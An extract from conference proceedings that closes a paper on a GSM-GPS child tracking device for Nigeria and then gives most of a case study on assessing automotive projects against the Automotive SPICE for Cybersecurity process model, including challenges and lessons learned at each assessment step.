5 Future Scope and Conclusion An extensive scope for further work is all-encompassing in the recommendations given below. 1. Though the Federal Republic of Nigeria can be considered to be sufficiently technologically advanced to have basic network infrastructure and network connectivity across all thirty-six states, even in the most advanced of nations there are blind spots that may either have very poor signal or may not have GSM cellular signal at all. GSM-GPS technology is very dependent on network signal and cannot afford to fail because of low signal. A low signal strength interrupt can be programmed within the microcontroller to automatically send the last known current location of the tracked to the registered mobile number once the microcontroller detects that the signal strength is dropping or below a certain threshold. 2. The interface of the tracker is not as user-friendly as it could be due to some constraints. There is no interface currently for registering the number the location messages are sent to except through direct configuration and editing of the number on the Arduino IDE environment. i. A software or web application could be built to improve its interface with users. Google Maps API could also be used in the improvement of this interface. It is a brilliant Google technology that allows for the use of the power of Google Maps to embed itself in applications or software. It is available for free online if monthly usage does not exceed a certain amount, allows for the adding of relevant material that
Developing a GSM-GPS Based Tracking System
633
users of the site will find valuable and allows for the customisation of the appearance and feel of the map to match the design or scope of usage of the site. For instance, for a parent with multiple kids, multiple trackers for these kids could be assigned to one number for visible monitoring of their locations when at school or any other locations at any and all times, with the need for location bearing SMS’s reduced to only in cases of emergency when the child exceeds that pre-set location and/or presses the panic button. However, this is only a more sophisticated version of the existing tracker. The registered phone number could also be configured through the use of SMS to maintain this paper’s cost-friendly objective. ii. Multiple numbers could also be registered for one tracker in the case that the holder of one registered number is busy in the event of an emergency. After all, the tracker does not fulfil its purpose if a message is sent in an emergency and the holder of the registered number does not see it in time. As a result of its primary significance and motivation of study being decreasing the vulnerability of school children in Nigeria and especially in poverty-affected areas like North Nigeria, a B2G theme was chosen. It is recommended that this tracker be proposed to the government, NGOs or other necessary bodies for contraction, financing and mass production. Workmanship, other excesses and profit could be fully compensated in this process. It could also still be treated as a commercial venture for those in high insecurity but not poverty-affected areas or individuals that are able to afford them. In conclusion, GSM-GPS based tracking technology has been reviewed, and a tracking system incorporating that technology has been designed to locate any individual or thing, with its design incorporating children’s unique vulnerability points. It should be noted that this paper is a proof of concept that can still be significantly improved upon as surmised in the recommendation subsection. There is more that can be done to secure the future of Nigeria in its children, but where the government has not yet begun to take the initiative, the industry can and should take steps toward that starting point.
References 1. Verjee, A., Kwaja, C.M.A.: An epidemic of kidnapping: interpreting school abductions and insecurity in Nigeria. Afr. Stud. Q. 20(3), 87–105 (2021) 2. Madubuegwu, C.E., Obiorah, C.B., Okechukwu, G.P., Emeka, O., Ibekaku, U.K.: Crises of Abduction of School Children in Nigeria: Implications and Policy Interventions, vol. 5, no. 7, pp. 48–57 (2021) 3. Nwagboso, C.I.: Nigeria and the challenges of internal security in the 21st century. Eur. J. Interdisc. Stud. 4, 15 (2018). https://doi.org/10.26417/ejis.v4i2a.p15-33 4. Faulkner, J.: The Importance of Being Innocent: Why we Worry About Children. Cambridge University Press, Cambridge (2010) 5. Ipingbemi, O., Aiworo, A.B.: Journey to school, safety and security of school children in Benin City, Nigeria. Transp. Res. Part F: Traffic Psychol. Behav. 19(2013), 77–84 (2013). https://doi.org/10.1016/j.trf.2013.03.004
634
A. Ifeoluwa and I. Francis
6. Ajala, A.T., Kilaso, B.: Safety and security consideration of school pupils in the neighbourhood. FUTY J. Environ. 13(2), 38–48 (2019) 7. Ge, X., Gu, R., Lang, Y., Ding, Y.: Design of handheld positioning tracker based on GPS/GSM. In: Proceedings of 2017 IEEE 3rd Information Technology and Mechatronics Engineering Conference, ITOEC 2017, vol. 2017-Janua, pp. 868–871 (2017). https://doi.org/10.1109/ ITOEC.2017.8122477 8. Hong, L.: no. “Child Tracking System” (2016) 9. Singh, M.: Real time vehicle tracking system using GSM and GPS technology-an anti-theft tracking system. (2017) 10. Maruthi, R.: SMS based bus tracking system using open source technologies. Int. J. Comput. Appl. 86(9), 44–46 (2014) 11. Lau, E.C.: Simple bus tracking system, vol. 3, no. 1, pp. 60–70 (2013) 12. Sankpal, A., Kadam, N.: Land vehicle tracking system, vol. 4, no. 3, pp. 2013–2016 (2015) 13. Patel, P., Rauniyar, S.K., Singh, T., Dwivedi, B., Tripathi, P.H.: Arduino based child tracking system using GPS and GSM. Int. Res. J. Eng. Technol. (IRJET) 5(3), 4137–4140 (2018) 14. Varsha, S., Vimala, P., Supritha, B.S., Ranjitha, V.D.: GPS and GSM-based tracking system for fisher man, soldiers, aged people and girls, vol. 4, no. 6, pp. 141–145 (2019) 15. Khutar, D.Z., Yahya, O.H., Alrikabi, H.T. S.: Design and implementation of a smart system for school children tracking. In: IOP 16. Ahire, A., Domb, P., More, M., Pednekar, P., Deshmukh, A.: Child tracking system using Arduino & GPS-GSM Kit. Int. J. Recent Innov. Trends Comput. Commun. 6, 55–56 (2018) 17. Hlaing, N.N.S., Naing, M., Naing, S.S.: GPS and GSM based vehicle tracking system. Int. J. Trend Sci. Res. Dev. 3(4), 271–275 (2019). https://doi.org/10.31142/ijtsrd23718 18. Kaur, D.S.S.: Overview on GPS-GSM technologies used in vehicle tracking. Int. J. IT Knowl. Manag. (IJITKM) 8(1), 36–38 (2015). http://searchmobilecomputing.techtarget.com/defini tion/ 19. Rauf, F., Subramaniam, G., Adnan, Z.: Child tracking system. Int. J. Comput. Appl. 181(3), 1–4 (2018). https://doi.org/10.5120/ijca2018917071 20. Parts of A Circuit: Push Button | STEM Extreme. https://stemextreme.com/2021/01/21/partsof-a-circuit-push-button/. Accessed 23 June 2022 21. SIM800L-GSM Module. https://nanopowerbd.com/index.php?route=product/product&pro duct_id=141. Accessed 23 June 2022 22. U-blox NEO-6M GPS Module | Core Electronics Australia. https://core-electronics.com.au/ u-blox-neo-6m-gps-module.html. Accessed 23 June 2022 23. Arduino Nano Pinout, Specifications, Features, Datasheet & Programming. https://compon ents101.com/microcontrollers/arduino-nano. Accessed 23 June 2022 24. Arduino Nano 3 Compatible - Micro Robotics. https://www.robotics.org.za/NANO-CH340. Accessed 23 June 2022
Standardization of Cybersecurity Concepts in Automotive Process Models: An Assessment Tool Proposal Noha Moselhy1(B) and Ahmed Adel Mahmoud2 1 Principal ASPICE Assessor, CMMi v1.3 ATM, and a Process Improvement and Software
Engineering Quality Expert, Valeo, Egypt [email protected] 2 Provisional ASPICE Assessor, CMMi v1.3 ATM, and a Sr. Process Improvement and Assessments Engineer, Valeo, Egypt [email protected]
Abstract. In the world of high-tech and information communication domains, the usage of network communication and cloud services is an unavoidable need, which jeopardizes systems and software products to cyber-attacks, causing loss of money, vital information, or may be even causing safety hazards. Hence, cybersecurity is considered as an integral part of the development which grabbed a lot of focus in the late 20th century. This led some huge industries (e.g.: Automotive) and service providers to consider the release of specific standards and process models for Cybersecurity. In August 2021, the German Association for Automotive Industry “VDA” which holds the top car manufacturers worldwide as members to release a new process model appendix called: the Automotive SPICE for Cybersecurity, which focuses on Process Reference, Process Assessment Models for Cybersecurity Engineering, and on the Rating Guidelines of Process Performance for Cybersecurity Engineering. In this paper, a case study of the result of applying this new standard on a sample set of projects will be presented, showing the investigation of challenges and lessons learned by following the traditional methodology of process capability assessments in the new Cybersecurity process assessments, with an introduction of a few tool proposals to cope with the specific requirements and constraints of a Cybersecurity process model that can help practitioners in other domains (e.g.: SSE-CMM). The study also urges the VDA to officially consider those best practices into the newly released Cybersecurity process model of Automotive SPICE to ensure a secure product and threat-immune organizational infrastructure. Keywords: Automotive SPICE for cybersecurity · Automotive SPIC EPAM v3.1 · CMMi v1.3 · CMMi v2.0 · SSE-CMM · ISO27001 · SAE J3061 · ISO26262 · Automotive software · Improved implementation of process models · CMMi extension · SOC-CMM
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 635–655, 2023. https://doi.org/10.1007/978-3-031-28073-3_44
636
N. Moselhy and A. A. Mahmoud
1 Introduction Cybersecurity played a vital role in the development of many recent industries that depend on software and cloud communication. Remote hacking and cyber-attacks via system penetration or network based scanning is a threat that results in high risks which jeopardize the safety of many souls already, not to mention the loss of vital assets. In the past, information systems vulnerability would only arise from malfunction of one or more features of the internal software, but today, it is not enough to implement validation and verification mechanisms (e.g.: Testing, Protection Mechanisms, Audits, Application of Traditional Standard Process Models) without considerations of security factors from the external environment of the software product. As a result, the automotive industry became aware of such challenges, and started to introduce guidelines for the development of both safety and security-based solutions. Furthermore, a new factor was introduced to the equation by the German Association of the Automotive Industry “VDA” [1]; which is the “Automotive SPICE® [4] for Cybersecurity”, giving not only guidelines for technical implementation of such systems, but also a guide for The Process Model implementers and assessors to evaluate the development process of the Cybersecurity components (System or Software) versus the expectations of the standards. In the course of this paper, we will demonstrate the process of assessments using Automotive SPICE for Cybersecurity [2] assessment model by a case study while showing the key challenges realized along with proposals for potential improvements and lessons learnt that can be introduced to the assessments process to mitigate those challenges. This paper will also demonstrate by example and propose some tools that can be used by the Automotive SPICE process model practitioners to help reach the goals described in the standard. These tools and techniques would aid them in satisfying their assessment needs as per the Automotive SPICE for Cybersecurity model. This paper is organized as follows: 1) Introduction, Scope and paper background. 2) The Case study methodology. 3) The Case Study Observation and Consolidation. 4) Results, Conclusion & Improvement Proposals, and finally 5) Recommendation for future work. 1.1 Scope This paper addresses the automotive tier one suppliers in general and automotive software suppliers who are providing software solutions in the automotive field in specific. Currently, most of the Original Equipment Manufacturers “OEMs” in the automotive industry require suppliers to be certified in Automotive SPICE as a prerequisite for becoming and remaining a supplier in the OEM’s database or being considered for future business. Also, in non-embedded systems development atmospheres, most of the Customers require the Operational Center to be certified for CMMi for development v1.3 [7] at least for a certain scope. Extending those requirements to include compliance to Cybersecurity standards [6] is a natural expectation, especially in communication domains.
Standardization of Cybersecurity Concepts in Automotive Process Models
637
As for the lessons learned from applying the Cybersecurity process models in nonembedded software development organizations (such as the SSE-SMM [3]), please refer to the background section. This paper addresses a case study which is basically the result of applying the Automotive SPICE for Cybersecurity process model appendix on a selected sample of projects in a certain environment with Cybersecurity development scope. The scope of the process capability assessment, and the process profile of it as agreed with the sponsors on the selected sample of projects is described in Table 1: Table 1. Assessment scope - targeted process areas Assessment inputs
In scope aspects
Out-of-scope aspects
Number of assessment projects
4
Projects with Non-Cybersecurity scope or SPICE requirements
Target capability level of SPICE
CL1
CL2/3
Assessed process attribute
PA1.1
PA2.1, PA2.2, PA3.1, PA3.2 & Above
Process group
Management, Engineering (System, Software, & Cybersecurity), & Support
Acquisition, Organizational, Process Improvement, Reuse, and Supply
Process areas
VDA Scope: MAN.3, MAN.7, SYS.2–5, SWE.1-6, SEC.1-4, SUP.1, SUP.8-10
ACQ.2, ACQ.4
Characteristics
Class 3, Type C
–
The scope also considered the dependencies between the engineering process areas and the security process areas in both implementation and rating by following the ASPICE Rating guideline. 1.2 Background and Approaches The need to include security engineering standard approaches and maturity assessments models into Information Technology and software product development processes including Embedded and non-Embedded development processes has been under study for many years now due to the increasing importance of Cybersecurity considerations in the technological field. In the non-embedded software development field, where the CMMi process model is widely used as a standard process model, and on the year 2008, Some efforts were done to demonstrate the need for standardization of organization-wide security practices when Marbin Pazos-Revilla and Ambareen Siraj from “Tennessee Technological University, Department of Computer Science” submitted one of the important papers on SSE-CMM Implementation called: “Tools and Techniques for SSE-CMM Implementation” [13].
638
N. Moselhy and A. A. Mahmoud
This paper [13] demonstrated the importance of standardization of security process practices as it increases productivity, efficiency, and customer satisfaction. The Security System Engineering Capability Maturity Model (SSE-CMM) offers industry practitioners such a choice of security engineering standard that can be implemented and integrated at different organizational levels according to assurance needs. Although SSECMM provides the necessary roadmap for adopting organization-wide quality security engineering practices, it does not specifically point out any tools and techniques that can be used to help reach the goals described in the standard. This paper [13] proposed some of the tools that can aid the practitioners in satisfying their assurance needs. Following those efforts, an effort was being exerted in Measuring the Capability Maturity of Security Operations Centers “SOC-CMM” [14], which was created as a Master’s thesis research project in the year 2016 for the master’s program Master of Information Security, part of the Luleå University of Technology (LTU) educational catalog. The SOC-CMM was created by Rob van Os, MSc. Rob is a strategic SOC advisor, who has practical experience in security administration, security monitoring, security incident response, security architecture and security operations centers. The SOC-CMM combines the practical testing and experiences to create a usable maturity assessment tool. The major challenge in defining the SOC-CMM is that it was created to realize the operation centers security and does not address the final software and technological product security for possible breaches and attacks. Another challenge was that it did not address the elicitation of Cybersecurity product requirements, implementation, risk treatment or validation for technological and software projects. Regarding the experience with such Cybersecurity assessment models part, and how to measure the capability of process activities and maturity of organizations: On 2008, Clear Improvements & Associates, LLC submitted an important presentation [5] during the “SEPG” conference to highlight the lessons learned from a joint CMMI (v1.2) and SSE-CMM (v3.0) Class B SCAMPI Appraisal. However, the study didn’t cover the automotive scope yet, and also didn’t propose a sample of the tools to be used in such Cybersecurity specific assessments. As for the automotive industry, and specifically in December of the year 2015, Mark S. Sherman from the Software Engineering Institute “SEI” submitted one of the important papers on the cybersecurity considerations for vehicles under the title: “CYBERSECURITY CONSIDERATIONS FOR VEHICLES” in the “Software Engineering Institute” [8]. The paper addressed the number of ECUs and software in modern vehicles containing up to 100 ECUs, which are connected to fulfill their respective functions, and how Cybersecurity requirements need to expand to cover possible threats coming from communication of such a huge number of ECU’s. However, the paper didn’t address any development process-relevant techniques. In the year 2021, Stephanie Walton and Patrick R.Wheeler submitted one of the important papers on cybersecurity analysis in the current and future time called: “An Integrative Review and Analysis of Cybersecurity Research: Current State and Future Directions” in “Journal of Information Systems” [9].
Standardization of Cybersecurity Concepts in Automotive Process Models
639
The paper addressed the Advances in information technology. Also that it has greatly changed communications and business transactions between firms and their customers and suppliers. As a result, cybersecurity risk attracts ever increasing attention from firms, regulators, customers, shareholders, and academics. They conducted an extensive analysis of cybersecurity-related papers in the accounting, information systems, computer science, and general business disciplines. Their review integrates and classifies 68 cybersecurity papers, but despite increasing interest in cybersecurity research, the literature lacks an integrative review of existing research identifying opportunities for future cybersecurity developments. The two types of automotive papers referred above stand as an example of how to deploy standards of Cybersecurity from technical point of view only, with no-tominimal focus on process activities - neither in embedded nor non-embedded software environments. On August 2021, and right after the VDA has released the official version of the Automotive SPICE appendix for Cybersecurity, Chrisitian Schlager from Graz University published a paper titled: “The Cybersecurity Extension for ASPICE - A View from ASPICE Assessors” [10], which studied the relationship between the Cybersecurity process areas, and base practices from other process areas of the primary and management process groups in the A-SPICE standard. Back then, it was too tight for Dr. Schlager or anybody else to study or present any insights from applying the new model itself to come up with some challenges to reflect upon or some lessons learned to share. In the same month, another paper was published by Springer in the EuroSPI conference titled “Impact of the New A-SPICE Appendix for Cybersecurity on the Implementation of ISO26262 for Functional Safety” [11] presented by Noha Moselhy and Yasser Aly which addressed the possible integration strategies of different standards and work products required by the A-SPICE for Cybersecurity and the ISO 26262 [12] for Functional Safety to save time and effort of Development Projects. Later this year, and in her paper: “A-SPICE for Cybersecurity: Analysis and Enriched Practices” published by Springer on Aug, 2021, Esraa Magdy [16] – A Cybersecurity Expert – has addressed a few improvement proposals that A-SPICE for Cybersecurity can consider to improve the assessments effectiveness and efficiency – However, the paper didn’t provide enough typical examples and evidences of work products from real implementation that a practitioner can adapt to in order to fulfill A-SPICE process outcomes. Recently this year, on Jan, 2022, Dr. Richard published a new paper titled: “Automotive Cybersecurity Manager and Engineer Skills Needs and Pilot Course Implementation” [17] that addressed possible skills that Cybersecurity engineers and managers should have, but the paper was focused on the needed training and certification content and didn’t introduce a solution to the skill need of a Cybersecurity engineer to master the compliance of his work products versus different standards in the field like Automotive SPICE. All of the aforementioned papers however, did not in fact address any real experience from applying the newly released standard of Cybersecurity from Automotive SPICE.
640
N. Moselhy and A. A. Mahmoud
1.3 Motive A major motive behind this paper [15], is that in the year Aug, 2021 the German Automotive Association “VDA” has released a new appendix for process assessment models dedicated specifically to Cybersecurity development called the “Automotive SPICE for Cybersecurity” [2] which addresses how the process capability shall be evaluated for Cybersecurity development projects from two points of view: • Cybersecurity Product-Related Project Risks • Cybersecurity Process Improvement The challenges in deploying this model [2] and assessing its process areas in respect to A-SPICE are emerging just now as the automotive industry manufacturers start to request the compliance to A-SPICE for Cybersecurity from every project, while the automotive suppliers are still trying to understand and implement it considering the new constraints implied by the Cybersecurity practices. The challenges are not only in deploying the process model but in the assessment procedure itself. The need for tools and techniques to aid in the assessment of the desired process areas was highlighted during the early assessment trials which acted as a motive to tackle the challenges, generate lessons learned and propose tools and techniques for process assessments using the Automotive SPICE Process Assessment Model for Cybersecurity Engineering. Automotive SPICE stands for Automotive Software Process Improvement and Capability dEtermination. It was created in the year 2001 as a variant of the ISO/IEC 15504 (SPICE) to assess the performance of the development processes of OEM suppliers in the automotive industry. It defines best practices and processes to ensure the highest quality of embedded automotive system and software development. The certification process is based on the audit conducted by external, or independent A-SPICE-certified assessors by an academic certification body. A-SPICE was developed by the AUTOSIG (Automotive Special Interest Group) which consists of SPICE User Group, the Procurement Forum, and the German automotive constructors: Audi, BMW, Daimler, Porsche, Volkswagen, along with other international automotive manufacturers like Fiat, Ford, Jaguar, Land Rover, Volvo, who together formulate the VDA association members. The processes of A-SPICE are clustered by common topics—like acquisition, management, engineering, supply, support and logistics—to form the so-called process areas which Automotive SPICE uses to describe the life cycle of electronic products as shown below in Fig. 1. The assessment model (PAM) maps the extent of process performance to specific capability levels and defines how these levels can be assessed. Capability levels measure on a given scale the extent how far a process is performed as described in Fig. 2 and 3. Automotive SPICE conforms to ISO/IEC 15504-2 assessment requirements. The assessments evaluate on six levels how an organization is capable of running mature processes. The framework defines for each level specific capability indicators to measure the extent of achievement. ASPICE process area assessment is based on rating the process attributes (PA), a capability level X is reached if its PAs are at least L and all lower PAs are F as indicated in Fig. 4 and Table 2.
Standardization of Cybersecurity Concepts in Automotive Process Models
641
Fig. 1. Automotive SPICE [2] and automotive SPICE for cybersecurity process reference model – overview
Fig. 2. N/P/L/F measurement scale
Fig. 3. N/P/L/F further refined measurement scale [4]
642
N. Moselhy and A. A. Mahmoud
Fig. 4. Process capability levels [4]
2 Case Study Methodology and Scope A process capability assessment has been applied using the newly released process model for Cybersecurity from A-SPICE on a selected set of four software projects with Cybersecurity development components, followed by a case study to determine the impact of releasing the new Automotive SPICE appendix for Cybersecurity on the assessment methodology in terms of challenges, and as well to apply a few best practices using a newly introduced assessment tool that complies to the requirements of A-SPICE for Cybersecurity. The case study has been followed by a generated list of lessons learned as a result of applying the new tool that can guide the model practitioners on best practices during assessments, as well as all organizations with Cybersecurity project scope as described in Fig. 5. Sample Selection: A specific set of sample projects were selected especially for the sake of performing a BETA trial assessment of the new A-SPICE process model for Cybersecurity. 1) The project set consists of four projects from various platforms, and different product requirements. All of the selected projects have system, software and Cybersecurity module development which implement a few security protection mechanisms, with potential target level of A-SPICE compliance. 2) The teams working on these projects are familiar with Automotive SPICE process reference model requirements, and have participated in earlier assessments before the new Cybersecurity appendix release. 3) The assessment team is all of certified A-SPICE assessors and consists of 3 team members: 1 lead assessor, and 2 co-assessors. 4) The assessment tool has already been used before in traditional assessment, and 5) The assessment scope has been defined as per Sect. 1.1.
Standardization of Cybersecurity Concepts in Automotive Process Models
643
Table 2. Process capability level model according to ISO/IEC 33020 [4] Scale
Process attribute
Rating
Level 1
PA 1.1: Process Performance
Largely
Level 2
PA 1.1: Process Performance PA 2.1: Performance Management PA 2.2: Work Product Management
Fully Largely Largely
Level 3
PA 1.1: Process Performance PA 2.1: Performance Management PA 2.2: Work Product Management PA 3.1: Process Definition PA 3.2: Process Deployment
Fully Fully Fully Largely Largely
Level 4
PA 1.1: Process Performance PA 2.1: Performance Management PA 2.2: Work Product Management PA 3.1: Process Definition PA 3.2: Process Deployment PA 4.1: Quantitative Analysis PA 4.2: Quantitative Control
Fully Fully Fully Fully Fully Largely Largely
Level 5
PA 1.1: Process Performance PA 2.1: Performance Management PA 2.2: Work Product Management PA 3.1: Process Definition PA 3.2: Process Deployment PA 4.1: Quantitative Analysis PA 4.2: Quantitative Control PA 5.1: Process Innovation PA 5.2: Process Innovation Implementation
Fully Fully Fully Fully Fully Fully Fully Largely Largely
Fig. 5. The steps of this case study methodology followed in this paper
Performing the Assessment and Analyzing the Challenges: In this step, the same list of project work products were inspected and evaluated against Automotive SPICE including the Cybersecurity appendix, the assessment was done via direct interviews
644
N. Moselhy and A. A. Mahmoud
with the project teams, objective evaluation of the evidence they demonstrated, and in accordance with the ISO/IEC15004 requirements, and following the Automotive SPICE guidelines and steps for Assessments. Recording the Observations, and Consolidating the Solutions: In this step, results and obtained data of the inspection from the previous step are consolidated. An investigation was carried out to determine the effective solutions that were used during each of the assessment steps to tackle the challenges that were faced by the assessment team, including the usage of new assessment tools and techniques after impact of the new Automotive SPICE process group for Cybersecurity (SEC). Conclusion: In this step a final recommendation is given via a list of lessons learned that were reached in each of the assessment steps based on application of the new proposed Cybersecurity practices on the selected projects, and using the new customized assessment tools that were proposed by the assessment team.
3 Case Study Observations and Results Consolidation A case study was conducted on a sample of four projects from different product lines selected specifically for the experiment of this research, where the new process model appendix of Cybersecurity from A-SPICE has been used for assessment. The selected projects have Cybersecurity software components, and also have requirements from the customers to reach a specific capability level of Automotive SPICE for Cybersecurity - However, for confidentiality reasons, these projects will only be referred anonymously within the course of this paper. The case study aimed at recording the observations from four assessments of the four projects, focusing only on the common challenges, lessons learned, and best practices that were encountered during the new process model application on the real operational environment of the four project, and not on the rating results of the assessments. The case study cared to write the investigation of these challenges and lessons learned in a simple and readable format for researchers. 3.1 Overview of Automotive SPICE Assessment Methodology Steps In the Automotive SPICE standard, the assessment is carried out following certain steps, in this section we demonstrate an overview of these steps as shown in Fig. 6. Later, we will deeply investigate the application of each step performed during our experimental assessments in order to explore the challenges we faced in each step, and generate the possible lessons learned or best practices of each step. 3.2 Details of the 1st Automotive SPICE Assessment for Cybersecurity (Challenged/Lessons Learned) In this section we will go through each step of the assessment process to see the exact challenges we faced during the application of this new standard process model for Cybersecurity.
Standardization of Cybersecurity Concepts in Automotive Process Models
645
Fig. 6. ASPICE assessment process elements
We will also explore some of the lessons learnt and best practices we suggest for the new process model practitioners to follow in order to avoid similar pitfalls. Pre-assessment Key Activities: In this phase, the preparations for the assessment took place by the Lead Assessor and the Assessment Team members together with the project/organization unit who requested the assessment. No evaluation steps or ratings took place at this stage. Challenges: Process perspective: Existing process readiness: The projects under examination were using a Cybersecurity process that is not analyzed against the new process model of Cybersecurity from A-SPICE. Assessment Perspective: Assessors Qualifications: The need for training/certification rounds for existing Assessors to the new A-SPICE appendix for Cybersecurity. Projects Perspective: Project Team Understanding: Project team coaching sessions on the new requirements of the A-SPICE appendix for Cybersecurity. Lessons Learned & Base Practices: Establish project PWG to perform gap analysis between the implemented projects. Cybersecurity processes/templates, and the outcomes of the A-SPICE process model appendix for Cybersecurity. Coordinate with Cybersecurity Experts for the needed coaching sessions. Assessment Step One: Assessment Planning Key Activities: Set Assessment Objectives with the Sponsors (Product related process risk, process improvement…).
646
N. Moselhy and A. A. Mahmoud
Agree Scope (Project Organization Units “OU”, Processes to be assessed, Target Capability Level, Assessment Class…). Agree on Constraints. Identify Assessment Schedule with participants. Challenges: Project Perspective: Redundancy in the schedule (inefficiency): Project Team participants for the engineering activities will have to attend two sessions per each process area to cover the rating for SYS/SW Engineering, plus the rating for the relevant Cybersecurity “SEC” process areas. Lessons Learned & Best Practices: Update the assessment tool to include an automated mapping between the rating of the base practices for the Cybersecurity “SEC” process areas, and the relevant base practices of the Engineering “SYS/SWE” process areas to show the discrepancies in the rating of the dependent base practices following the Rating Guidelines advised by the Automotive SPICE standard appendix for Cybersecurity assessments [2] as demonstrated in Fig. 7 and following process areas mapping in Fig. 8.
Fig. 7. Proposed solution for an assessment tool to support the rating between dependent base practices from different process areas according to the A-SPICE rating guidelines for cybersecurity
Assessment Step Two: Assessment Team Briefing Key Activities. Review of Assessment Plan. Determine Assessment Team Roles. Determine Storage of Received Work Products. Agree Usage of Assessment Tool (e.g.: checklists). Agree on decision making. Agree on work split between team members and methods for consolidation. Challenges. Assessment Perspective: Assessment Tools: The available assessment tools were not yet updated to reflect the new practices of A-SPICE for Cybersecurity appendix. Assessment Team level of knowledge/training of the new Cybersecurity process model from A-SPICE is not the same for all the assessment team members.
Standardization of Cybersecurity Concepts in Automotive Process Models
647
Fig. 8. Sample of mapping for the new cybersecurity process areas to the engineering process areas (system and software) of the A-SPICE process model [2]
Lessons Learned & Best Practices: Update the used assessment tools to include the requirements from A-SPICE for Cyber security as clarified in Fig. 9. Hold knowledge sharing sessions to raise the awareness and alignment of the new process model for Cybersecurity from A-SPICE as demonstrated in Fig. 11, and agree on the typical evidence for each process outcome inside the assessment tool as clarified in Fig. 10.
Fig. 9. Updated assessment tool to include process areas from cybersecurity new process model mapped to their related evidence with ability to rate according to the SPICE NPLF assessment method
648
N. Moselhy and A. A. Mahmoud
Fig. 10. Assessment tool updated with recommended typical evidence to be checked from the organization under assessment
Fig. 11. Training material was prepared for the assessment team to introduce how the release of the new process model for cybersecurity will impact the assessment methodology
Assessment Step Three: On-Site Organizational Unit “OU” Briefing Key Activities. Introduction of teams (To break the ice and reduce anxiety). Inform project team about assessment plan - overview. Present the schedule. Let the team make short introduction of OU’s and how the work is distributed. Challenges. None. Lessons Learned & Best Practices:
Standardization of Cybersecurity Concepts in Automotive Process Models
649
None. Assessment Step Four: Information Gathering & Rating Key Activities. Examine Evidences & work products. Interview team members and listen to testimonials. Investigate Infrastructure. Explore project demonstrations, objectively. Perform Assessment team rating (in closed sessions). Maintain Traceability between examined evidence and ratings. Challenges. Assessment Perspective: Redundancy of Interview & Rating Efforts: Direct link between the base practices of Cybersecurity process areas and their relevant base practices of Primary Lifecycle process areas (System/Software engineering process areas) doesn’t exist in the assessment tool, which implies repeating a separate re-rating practice and the interviewing effort. Lack of previous experience with Cybersecurity domain from the assessors required extra effort in detecting the gaps and concluding the weaknesses. Project Perspective: Access rights of shared resources between OU’s can jeopardize the Cybersecurity constraints. Project Team level of awareness of the new Cybersecurity process model Terminology from A-SPICE is low, which led to difficulty in mapping the base practices to their typical evidences that were already available. Some of the work products listed by Automotive SPICE per process area don’t have equivalent artifacts available by the standard process implemented by the project yet. Lessons Learned & Best Practices: Rate each Indicator and Process Attribute of each process area separately as shown in Fig. 12. Automation of the assessment tool rating guidelines is necessary between dependent base practices. Raise Project team awareness of Cybersecurity SPICE through coaching sessions with Cybersecurity experts in the OU as shown in Fig. 13. Assessment Step Five: Feedback Presentation Preparation Key Activities. Refer Assessment Plan. Results include Process profile, Capability profile, Strengths/Weaknesses, Improvement Suggestions, Rating of Indicators. Include Executive Summary. Challenges. Assessment Perspective: Efficiency of the report preparation phase is reduced due to the complexity of the presented findings which include dependency between base practices from the System and Software process areas, and the Cybersecurity process areas. Lessons Learned & Best Practices:
650
N. Moselhy and A. A. Mahmoud
Fig. 12. Traceability of the base practices of MAN.7 process area for cybersecurity risk management from A-SPICE process model to their typical evidence recommendations from the assessment tool in addition to the relevant rating indicators from the assessor judgment
Fig. 13. Outline of the training module conducted for the project team on the new process model Appendix of cybersecurity from A-SPICE
Automation of the assessment tool was done by the assessment team to automatically generate the final assessment report which includes all objective findings linked to their relevant base practices & impacted process area via a script to produce an output as clarified in Fig. 15. This saved around 85% of the reporting time as shown in the automated assessment tool workflow in Fig. 14. Assessment Step Six: Final Feedback Presentation Key Activities. Assessment Outcome presentations. Subsequent process improvements.
Standardization of Cybersecurity Concepts in Automotive Process Models
651
Fig. 14. Workflow of the automated assessment tool which is used to generate assessment reports via a script
Fig. 15. Generated report from the automated assessment tool script exported format
Do pre-briefing/briefing with the Sponsors and OU Management (emphasize the assessment goals, respect confidentiality, treat participants anonymously). Include process profiles, capability profiles, & weaknesses. Co-assessors shall take notes for assessment team improvement. Respond to questions. Challenges. Project Perspective: Skipping the pre-briefing with the Sponsors led to an extended briefing session in order to explain to them the complex findings in the required level of details which guarantee understanding of the areas for improvement. Process Perspective: Difficulty for the organization to identify improvement proposals for the detected gaps due to novelty, and complexity of the presented findings which include dependency between engineering process group practices, and Cybersecurity process practices, this led to lack of up-to-date information in the implemented process by the project. Assessment Perspective: Reposing to questions about future improvements of the existing process led to an extended briefing session. Lessons Learned & Best Practices: Ensure to hold a pre-briefing session with the Sponsors. Team questions about improvements can be handled in a separate “workout session” between the assessment and the project teams. We defined a process working group within the project organization which includes process engineers, cybersecurity experts, and A-SPICE experts to perform a mapping and a gap analysis between the implemented processes/templates inside the project for both System/Software and cybersecurity engineering processes and the detected findings
652
N. Moselhy and A. A. Mahmoud
from the conducted SPICE assessment to ensure a robust process update which considers dependencies as shown in Fig. 16. A classic process update setup is no longer helpful.
Fig. 16. Gap analysis between existing process used by the project and the cybersecurity base practices from the new process model Appendix of A-SPICE
Assessment Step Seven: Assessment Debriefing Key Activities. Sponsors sign assessment logs. Discuss post assessment actions (e.g.: Assessment method improvement suggestions, team lessons learned…). Challenges: None. Lessons Learned & Best Practices. None. Assessment Step Eight: Assessment Final Report. Key Activities. Finalize Assessment Report. Review assessment report. Distribute final assessment report to stakeholders and sponsors. Challenges. Assessment Perspective: More time was consumed in report review activity than usual. Lessons Learned & Best Practices: Plan more time for the assessment report review activity until the practice stabilizes between assessors.
Standardization of Cybersecurity Concepts in Automotive Process Models
653
